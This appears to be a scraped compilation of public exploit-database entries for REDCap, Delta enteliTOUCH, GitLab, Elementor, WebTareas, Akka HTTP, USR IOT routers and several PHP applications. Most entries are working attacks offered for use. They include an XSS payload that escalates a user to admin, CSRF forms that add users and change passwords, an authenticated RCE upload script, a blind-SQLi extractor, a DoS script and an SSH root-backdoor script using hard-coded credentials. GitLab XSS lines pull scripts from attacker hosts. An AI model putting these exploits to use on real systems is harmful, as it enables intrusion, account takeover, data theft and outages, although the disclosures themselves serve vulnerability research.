ISHACK AI BOT

# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting # Date: 2021-10-11 # Exploit Author: Kendrick Lam # References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js # Vendor Homepage: https://projectredcap.org # Software Link: https://projectredcap.org # Version: Redcap before 11.4.0 # Tested on: 11.2.5 # CVE: CVE-2021-42136 # Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf ### Stored XSS – Missing Data Code Value (found by Kendrick Lam) It was possible to store JavaScript as values for Missing Data Codes. - Where: Missing Data Code. - Payload: <script> var target = document.location.host; var csrf_token = csrf_token; var userId = '<userId>'; // Replace with your user ID. function privesc() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("Sec-Fetch-Dest", "empty"); xhr.withCredentials = "true"; var body = ""; body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token; xhr.send(body); return true; } privesc(); </script> - Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator). - Privileges: Low privileged / regular user - Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX - Privileges: + Store: Low privileged user is able to store Missing Data Code values. + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX

# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch CSRF</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5702 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php 06.04.2022 --> CSRF Add User: <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST"> <input type="hidden" name="actionName" value="" /> <input type="hidden" name="Username" value="zsl" /> <input type="hidden" name="Password" value="123t00t" /> <input type="hidden" name="AutoLogout" value="17" /> <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" /> <input type="hidden" name="ObjRef" value="" /> <input type="hidden" name="Apply" value="true" /> <input type="hidden" name="formAction" value="Add" /> <input type="submit" value="Go for UserAdd" /> </form> <br /> CSRF Change Admin Password (default: delta:login): <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST"> <input type="hidden" name="actionName" value="" /> <input type="hidden" name="Username" value="DELTA" /> <input type="hidden" name="Password" value="123456" /> <input type="hidden" name="AutoLogout" value="30" /> <input type="hidden" name="SS&#95;SelectedOptionId" value="" /> <input type="hidden" name="ObjRef" value="ZSL-251" /> <input type="hidden" name="Apply" value="true" /> <input type="hidden" name="formAction" value="Edit" /> <input type="submit" value="Go for UserEdit" /> </form> </body> </html>

# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch XSS</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: Input passed to the POST parameter 'Username' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5703 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php 06.04.2022 --> <form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST"> <input type="hidden" name="userInfo" value="" /> <input type="hidden" name="UL&#95;SelectedOptionId" value="" /> <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" /> <input type="hidden" name="formAction" value="Delete" /> <input type="submit" value="CSRF XSS Alert!" /> </form> </body> </html>

Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Exploit Author: LiquidWorm Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: The application suffers from a cleartext transmission/storage of sensitive information in a Cookie. This allows a remote attacker to intercept the HTTP Cookie authentication credentials through a man-in-the-middle attack. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5704 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php 06.04.2022 -- GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1 Host: 192.168.0.210 Cache-Control: max-age=0 User-Agent: Toucher/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG Connection: close

# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) # Date: 31/01/2022 # Exploit Author: Hemant Kashyap # Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649 # Version: PKP Open Journals System 2.4.8 >= 3.3 # Tested on: All OS # CVE : CVE-2022-24181 # References: https://youtu.be/v8-9evO2oVg XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce: 1) Go to this site: https://who's-using-ojs-software.com 2) And capture this request in burp , and send to repeater. 3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com 4) And this click on send , after this right click on request and click on show response in browser , after this copy the request. 5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version. This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability

# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) # Date: 04/16/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://elementor.com/ # Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version) # Version: 3.6.0, 3.6.1, 3.62 # Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload) #!/usr/bin/python import requests import re # WARNING: This exploit does NOT include the payload. # Also, be sure you already have some valid credentials. This exploit needs an account in order to work. # # # # # VULNERABILITY DESCRIPTION # # # # # # The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file. # This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control) # The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php # # At the end of this file you can find this code: # add_action( 'admin_init', function() { # if ( wp_doing_ajax() && # isset( $_POST['action'] ) && # isset( $_POST['_nonce'] ) && # wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY ) # ) { # $this->maybe_handle_ajax(); # } # } ); # # This code is triggered whenever ANY user account visits /wp-admin # In order to work we need the following 4 things: # 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php # 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file) # 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function) # 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file) # # The file we upload must have the following structure: # 1. It must be a ZIP file. You can name it as you want. # 2. It must contain a folder called "elementor-pro" # 3. This folder must contain a file named "elementor-pro.php"# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else) # 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL # e.g. # <?php # /** # * Plugin Name: Elementor Pro # */ # // Actual PHP payload # ?> # This file will be YOUR payload (e.g. PHP Reverse Shell or anything else) # # WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload. # If it tries, for example, to connect to an offline host, it could lead to a Denial of Service. # In order to prevent this, I suggest you to use some variable to activate the payload. # Something like this (visit anypage.php?activate=1 in order to continue with the actual payload): # if (!isset($_GET['activate'])) # return; # Change the following 4 variables: payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target username = 'guest' # Change this with the username you want to use to log in password = 'test' # Change this with the password you want to use to log in # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # session = requests.Session() cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies def DoLogin(username, password): global cookies loginUrl = baseUrl + 'wp-login.php' adminUrl = baseUrl + 'wp-admin/' data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 } # search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"} # 4e8878bdba is just an example of nonce. It can be anything else. regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}') response = session.post(loginUrl, cookies=cookies, data=data) search = regexp.search(response.text) if not search: # I've tested this on WordPress v. 5.9.3 # Fix the regexp if needed. print('Error - Invalid credentials?') #print(response.text) else: return search.group(1) def UploadFile(fileName, nonce): uploadUrl = baseUrl + 'wp-admin/admin-ajax.php' data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce } files = { 'fileToUpload' : open(fileName, 'rb') } regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true response = session.post(uploadUrl, data=data, files=files) search = regexp.search(response.text) if not search: # If Elemento Pro is already installed, the upload will fail. # You can print the response to investigate further print ('Error - Upload failed') # print (response.text) return False else: print ('Upload completed successfully!') return True # Define YOUR method to activate your payload (if needed) def ActivatePayload(): payloadUrl = baseUrl + 'index.php?activate=1' session.get(payloadUrl) print('Trying to login...') nonce = DoLogin(username, password) print('Nonce found: ' + nonce) print('Uploading payload...') fileUploaded = UploadFile(payloadFileName, nonce) # Define YOUR method to activate your payload (if needed) if fileUploaded: print ('Activating payload...') ActivatePayload()

# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA # Date: 11/03/2022 # Exploit Author: Ali J # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0 # Version: 1.5.0 # Tested on: Windows 10 Steps to Reproduce: 1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables 2. Select any variable, click on delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for this. After that drop the request. 3. Login with user 2 in a seperate browser and execute the CSRF POC. 4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.

# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path # Discovery by: bios # Discovery Date: 2022-18-04 # Vendor Homepage: https://www.primera.com/ # Tested Version: 2.3.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ PTProtect PTProtect C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe Auto C:\>sc qc PTProtect [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PTProtect TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PTProtect DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo Host Name: DESKTOP-OUHAB1I OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19044 N/A Build 19044

# Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path # Discovery by: bios # Discovery Date: 2022-18-04 # Vendor Homepage: https://www.easeus.com/ # Tested Version: 15.1.0.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ EaseUS UPDATE SERVICE EaseUS UPDATE SERVICE C:\Program Files (x86)\EaseUS\ENS\ensserver.exe Auto C:\>sc qc "EaseUS UPDATE SERVICE" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EaseUS UPDATE SERVICE TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EaseUS UPDATE SERVICE DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo Host Name: DESKTOP-HR3T34O OS Name: Microsoft Windows 10 Home OS Version: 10.0.19042 N/A Build 19042

# Exploit Title: Gitlab 14.9 - Authentication Bypass # Date: 12/04/2022 # Exploit Authors: Greenwolf # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://about.gitlab.com/install # Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 # Tested on: Linux # CVE : CVE-2022-1162 # References: https://github.com/Greenwolf/CVE-2022-1162 A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. Exploit: New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password: 123qweQWE!@#000000000

# Exploit Title: Gitlab Stored XSS # Date: 12/04/2022 # Exploit Authors: Greenwolf # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://about.gitlab.com/install # Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 # Tested on: Linux # CVE : CVE-2022-1175 # References: https://github.com/Greenwolf/CVE-2022-1175 Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor. Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though. <pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre> Standard script include also works depending on the sites CSP policy. This is more stealthy. <pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>

# Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload # Date: 7/4/2022 # Exploit Author: Ünsal Furkan Harani (Zemarkhos) # Vendor Homepage: https://www.impresscms.org/ # Software Link: https://github.com/ImpressCMS/impresscms # Version: v1.4.4 # Description: Between lines 152 and 162, we see the function "extensionsToBeSanitized".Since the blacklist method is weak, it is familiar that the file can be uploaded in the extensions mentioned below. .php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc Impresscms/core/File/MediaUploader.php Between lines 152 and 162: private $extensionsToBeSanitized = array('php','phtml','phtm','php3','php4','cgi','pl','asp','php5');

# Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi # Date: 2022-25-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-27927 # References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Microfinance Management System allows SQL Injection via parameter 'customer_number' in /mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'customer_number' parameter and save it like poc.txt Then run SQLmap to extract the data from the database: sqlmap.py -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (error-based) customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 4. Burpsuite request: ---------------------- GET /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27 HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=rf50l831r3vn4ho0g6aef189bt Referer: http://localhost/mims/managecustomer.php User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments # Date: 18/4/2022 # Exploit Author: cxosmo # Vendor Homepage: https://akka.io # Software Link: https://github.com/akka/akka-http # Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7 # Tested on: Akka HTTP 10.2.4, Ubuntu # CVE : CVE-2021-42697 import argparse import logging import requests # Logging config logging.basicConfig(level=logging.INFO, format="") log = logging.getLogger() def send_benign_request(url, verify=True): log.info(f"Sending benign request to {url} for checking reachability...") try: r = requests.get(url) log.info(f"Benign request returned following status code: {r.status_code}") return True except Exception as e: log.info(f"The following exception was encountered: {e}") return False def send_malicious_request(url, verify=True): log.info(f"Sending malicious request to {url}") # Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing nested_comment_payload = "("*8191 headers = {'User-Agent': nested_comment_payload} try: r = requests.get(url, headers=headers) log.info(f"Request returned following status code: {r.status_code}") # Expected exception to be returned if server is DoSed successfully except requests.exceptions.RequestException as e: if "Remote end closed connection without response" in str(e): log.info(f"The server is unresponsive per {e}: DoS likely successful") except Exception as e: log.info(f"The following exception was encountered: {e}") if __name__ == "__main__": # Parse command line parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) required_arguments = parser.add_argument_group('required arguments') required_arguments.add_argument("-t", "--target", help="Target URL for vulnerable Akka server (e.g. https://localhost)", required="True", action="store") parser.add_argument("-k", "--insecure", help="Disable verification of SSL/TLS certificate", action="store_false", default=True) args = parser.parse_args() # Send requests: first is connectivity check, second is DoS attempt if send_benign_request(args.target, args.insecure): send_malicious_request(args.target, args.insecure)

# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated) # Date: 04/20/2022 # Exploit Author: Behrad Taher # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Version: < 2.4p3 # CVE : CVE-2021-43481 #The script takes 3 arguments: IP, user ID, session ID #Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i import requests, time, sys from bs4 import BeautifulSoup ip = sys.argv[1] id = sys.argv[2] sid = sys.argv[3] def sqli(column): print("Extracting %s from user with ID: %s\n" % (column,id)) extract = "" for i in range (1,33): #This conditional statement will account for variable length usernames if(len(extract) < i-1): break for j in range(32,127): injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j) url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip GET_cookies = {"webTareasSID": "%s" % sid} r = requests.get(url, cookies=GET_cookies) #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token" token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value'] #Because this is an authenticated vulnerability we need to provide a valid session token POST_cookies = {"webTareasSID": "%s" % sid} POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection} start = time.time() requests.post(url, cookies=POST_cookies, data=POST_data) end = time.time() - start if end > 5: extract += chr(j) print ("\033[A\033[A") print(extract) break #Modularized the script for login and password values sqli("login") sqli("password")

# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor # # # Vendor: Jinan USR IOT Technology Limited # Product web page: https://www.pusr.com | https://www.usriot.com # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808) # 1.2.7 (USR-LG220-L) # # Summary: USR-G806 is a industrial 4G wireless LTE router which provides # a solution for users to connect own device to 4G network via WiFi interface # or Ethernet interface. USR-G806 adopts high performance embedded CPU which # can support 580MHz working frequency and can be widely used in Smart Grid, # Smart Home, public bus and Vending machine for data transmission at high # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG, # flow control and has many advantages including high reliability, simple # operation, reasonable price. USR-G806 supports WAN interface, LAN interface, # WLAN interface, 4G interface. USR-G806 provides various networking mode # to help user establish own network. # # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials # within its Linux distribution image. These sets of credentials are never # exposed to the end-user and cannot be changed through any normal operation # of the device. The 'usr' account with password 'www.usr.cn' has the highest # privileges on the device. The password is also the default WLAN password. # Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022 # # ------------------------------------------------------------------------- # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14 # # --Got rewt! # # id;id root;pwd # uid=0(usr) gid=0(usr) # uid=2(root) gid=2(root) groups=2(root) # /root # # crontab -l # */2 * * * * /etc/ltedial # */20 * * * * /etc/init.d/Net_4G_Check.sh # */15 * * * * /etc/test_log.sh # */120 * * * * /etc/pddns/pddns_start.sh start & # 44 4 * * * /etc/init.d/sysreboot.sh & # */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop; # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop; # cat /tmp/usrlte_info # Local time is Fri Apr 15 05:38:56 2022 # (loop) # IMEI Number:8*************1 # Operator information:********Telecom # signal intensity:normal(20) # # Software version number:E*****************G # SIM Card CIMI number:4*************7 # SIM Card number:8******************6 # Short message service center number:"+8**********1" # system information:4G Mode # PDP protocol:"IPV4V6" # CREG:register # Check ME password:READY # base station information:"4**D","7*****B" # cat /tmp/usrlte_info_imsi # 4*************7 # # exit # # lqwrm@metalgear:~$ # ------------------------------------------------------------------------- # # Tested on: GNU/Linux 3.10.14 (mips) # OpenWrt/Linaro GCC 4.8-2014.04 # Ralink SoC MT7628 PCIe RC mode # BusyBox v1.22.1 # uhttpd # Lua # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5705 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php # # # 10.04.2022 # import paramiko as bah import sys as baaaaaah bnr=''' ▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄ █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██ █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪ ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌· ▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄ ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █· ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄ ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌ ·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀ ▀▄ █·▪ ▪ •██ ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪ ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌· ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ · ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀. ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀ ''' print(bnr) if len(baaaaaah.argv)<2: print('--Gief me an IP.') exit(0) adrs=baaaaaah.argv[1] unme='usr' pwrd='www.usr.cn' rsh=bah.SSHClient() rsh.set_missing_host_key_policy(bah.AutoAddPolicy()) try: rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook. print('--Got rewt!') except: print('--Backdoor removed.') exit(-1) while True: cmnd=input('# ') if cmnd=='exit': rsh.exec_command('exit') break stdin,stdout,stderr = rsh.exec_command(cmnd) print(stdout.read().decode().strip()) rsh.close()

# Exploit Title: WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) # Google Dork: - # Date: 2022-03-13 # Exploit Author: Roel van Beurden # Vendor Homepage: - # Software Link: https://downloads.wordpress.org/plugin/advanced-uploader.4.2.zip # Version: <=4.2 # Tested on: WordPress 5.9 on Ubuntu 18.04 # CVE: CVE-2022-1103 1. Description: ---------------------- WordPress Plugin Advanced Uploader <=4.2 allows authenticated arbitrary file upload. Any file(type) can be uploaded. A malicious user can perform remote code execution on the backend webserver. 2. Proof of Concept: ---------------------- - Upload file/webshell/backdoor with the Advanced Uploader plugin; - File is uploaded in the Wordpress Media Library; - Go to /wp-content/uploads/ where the file is saved; - Click on the uploaded file for whatever it's supposed to do (RCE, reverse shell). 3. Exploitation demo: ---------------------- https://www.youtube.com/watch?v=Bwpf-IpxtXQ

